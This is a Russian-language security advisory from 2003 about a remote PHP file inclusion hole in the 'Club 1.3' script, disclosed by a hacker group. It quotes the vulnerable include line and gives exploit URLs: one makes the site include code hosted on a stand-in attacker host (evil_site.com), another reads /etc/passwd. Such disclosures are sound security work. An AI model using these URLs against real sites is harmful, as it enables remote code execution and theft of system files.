__________ ___ ___ \______ \__ __ ______/ | \ | _/ | \/ ___/ _ \ | | \ | /\___ \\ / |____|_ /____//____ >\___|_ / -======\/==security=\/=team==\/ Advisory#6 Продукт: Club 1.3 Автор: http://www.lyanguzov.inc.ru/ Уязвимость: PHP source injection, просмотр любых файлов bug found by 1dt.w0lf 08.05.2003 О программе... Club - Скрипт для создания на сайте клуба, клана, тайного общества, фотоальбома, чата и так далее... Уязвимость... Уязвимость обнаружена в файле club.php в строках: if ($p == "3") { include "$param"; } Переменная $param не проверяется на наличие опасных символов и мы можем включить произвольный пхп код или просмотреть любой файл на диске. Пример: Включение ПХП кода: Создаем на нашем сайте www.evil_site.com файл cmd.php следующего содержания: Теперь при переходе на следующий урл: www.victim.com/CLUB/club.php?p=3¶m=http://www.evil_site.com/cmd.php где www.victim.com - сайт с уязвимым скриптом CLUB - директория клуба Мы получим листинг директории на уязвимом сайте. Просмотр любых файлов на диске: www.victim.com/CLUB/club.php?p=3¶m=/любой_файл пример: www.victim.com/CLUB/club.php?p=3¶m=/etc/passwd